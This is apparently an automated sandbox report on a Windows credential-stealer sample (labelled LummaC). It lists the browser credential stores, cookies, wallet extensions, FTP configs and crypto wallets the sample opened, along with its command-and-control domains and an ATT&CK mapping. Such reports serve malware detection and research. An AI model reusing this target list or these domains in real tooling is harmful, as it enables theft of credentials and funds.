              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
              Source: C:\Users\user\Desktop\X2hna87N3Y.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
              Source: Yara matchFile source: Process Memory Space: X2hna87N3Y.exe PID: 7536, type: MEMORYSTR

              Remote Access Functionality

Source: Yara match | File source: Process Memory Space: X2hna87N3Y.exe PID: 7536, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK matrix, listed per tactic (the number in parentheses is the count shown next to that technique in the original matrix):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Windows Management Instrumentation (2); PowerShell (1); At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: Process Injection (211); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: Virtualization/Sandbox Evasion (11); Process Injection (211); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (3); Software Packing (1); DLL Side-Loading (1); Compile After Delivery
Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: System Time Discovery (1); Query Registry (1); Security Software Discovery (141); Virtualization/Sandbox Evasion (11); Process Discovery (1); File and Directory Discovery (11); System Information Discovery (33)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Archive Collected Data (1); Data from Local System (41); Clipboard Data (2); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: Encrypted Channel (21); Non-Application Layer Protocol (2); Application Layer Protocol (113); Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

Source | Detection | Scanner | Label
X2hna87N3Y.exe | 53% | Virustotal |
X2hna87N3Y.exe | 50% | ReversingLabs | Win32.Exploit.LummaC
X2hna87N3Y.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
https://tacitglibbr.biz/api5pnX | 100% | Avira URL Cloud | malware
https://tacitglibbr.biz/$ | 100% | Avira URL Cloud | malware
https://tacitglibbr.biz/apiGy | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
tacitglibbr.biz | 104.21.50.161 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
sordid-snaked.cyou | false | | high
awake-weaves.cyou | false | | high
immureprech.biz | false | | high
https://tacitglibbr.biz/api | false | | high
deafeninggeh.biz | false | | high
tacitglibbr.biz | false | | high
debonairnukk.xyz | false | | high
diffuculttan.xyz | false | | high
effecterectz.xyz | false | | high
wrathful-jammy.cyou | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | X2hna87N3Y.exe, 00000002.00000003.1790862040.0000000003849000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1790714563.000000000385F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://tacitglibbr.biz/ | X2hna87N3Y.exe, 00000002.00000003.1967520057.0000000003843000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1967608175.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1898523621.0000000003843000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000002.1968906269.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1861640861.0000000003842000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1837473248.0000000003841000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1838884443.0000000003843000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1865958853.0000000003843000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1908365458.0000000003843000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1861061599.0000000003841000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1923244085.0000000003843000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1837946467.0000000003843000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1860626926.0000000003841000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1839293002.0000000003843000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1836962329.0000000003841000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1910866448.0000000003843000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | X2hna87N3Y.exe, 00000002.00000003.1790862040.0000000003849000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1790714563.000000000385F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg | X2hna87N3Y.exe, 00000002.00000003.1839293002.000000000383A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | X2hna87N3Y.exe, 00000002.00000003.1790862040.0000000003849000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1790714563.000000000385F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://tacitglibbr.biz/api5pnX | X2hna87N3Y.exe, 00000002.00000003.1899145307.0000000003848000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417. | X2hna87N3Y.exe, 00000002.00000003.1839293002.000000000383A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | X2hna87N3Y.exe, 00000002.00000003.1790862040.0000000003849000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1790714563.000000000385F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | X2hna87N3Y.exe, 00000002.00000003.1837741208.000000000386E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta | X2hna87N3Y.exe, 00000002.00000003.1839293002.000000000383A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | X2hna87N3Y.exe, 00000002.00000003.1790862040.0000000003849000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1790714563.000000000385F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://tacitglibbr.biz/apiGy | X2hna87N3Y.exe, 00000002.00000003.1967520057.0000000003848000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000002.1969538530.0000000003848000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1923244085.0000000003843000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://ocsp.rootca1.amazontrust.com0: | X2hna87N3Y.exe, 00000002.00000003.1837741208.000000000386E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | X2hna87N3Y.exe, 00000002.00000003.1815799189.0000000003885000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1791495698.0000000003885000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1791387786.0000000003885000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1791313972.000000000388C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | X2hna87N3Y.exe, 00000002.00000003.1815799189.0000000003885000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1791495698.0000000003885000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1791387786.0000000003885000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1791313972.000000000388C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | X2hna87N3Y.exe, 00000002.00000003.1790862040.0000000003849000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1790714563.000000000385F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | X2hna87N3Y.exe, 00000002.00000003.1838918603.000000000395C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://tacitglibbr.biz/$ | X2hna87N3Y.exe, 00000002.00000003.1898523621.0000000003843000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1908365458.0000000003843000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1923244085.0000000003843000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1910866448.0000000003843000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://ac.ecosia.org/autocomplete?q= | X2hna87N3Y.exe, 00000002.00000003.1790862040.0000000003849000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1790714563.000000000385F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | X2hna87N3Y.exe, 00000002.00000003.1839293002.000000000383A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi | X2hna87N3Y.exe, 00000002.00000003.1839293002.000000000383A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.c.lencr.org/0 | X2hna87N3Y.exe, 00000002.00000003.1837741208.000000000386E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | X2hna87N3Y.exe, 00000002.00000003.1837741208.000000000386E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | X2hna87N3Y.exe, 00000002.00000003.1791387786.0000000003860000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | X2hna87N3Y.exe, 00000002.00000003.1790862040.0000000003849000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1790714563.000000000385F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.microsof | X2hna87N3Y.exe, 00000002.00000003.1791313972.000000000388E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crt.rootca1.amazontrust.com/rootca1.cer0? | X2hna87N3Y.exe, 00000002.00000003.1837741208.000000000386E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | X2hna87N3Y.exe, 00000002.00000003.1791387786.0000000003860000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/products/firefoxgro.all | X2hna87N3Y.exe, 00000002.00000003.1838918603.000000000395C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | X2hna87N3Y.exe, 00000002.00000003.1790862040.0000000003849000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1790714563.000000000385F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94 | X2hna87N3Y.exe, 00000002.00000003.1839293002.000000000383A000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.50.161 | tacitglibbr.biz | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1576576
Start date and time: 2024-12-17 09:43:46 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 22s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: X2hna87N3Y.exe (renamed because the original name is a hash value)
Original Sample Name: 443f4cf9f362a96bbd0845ba6d2859f0.exe
Detection: MAL
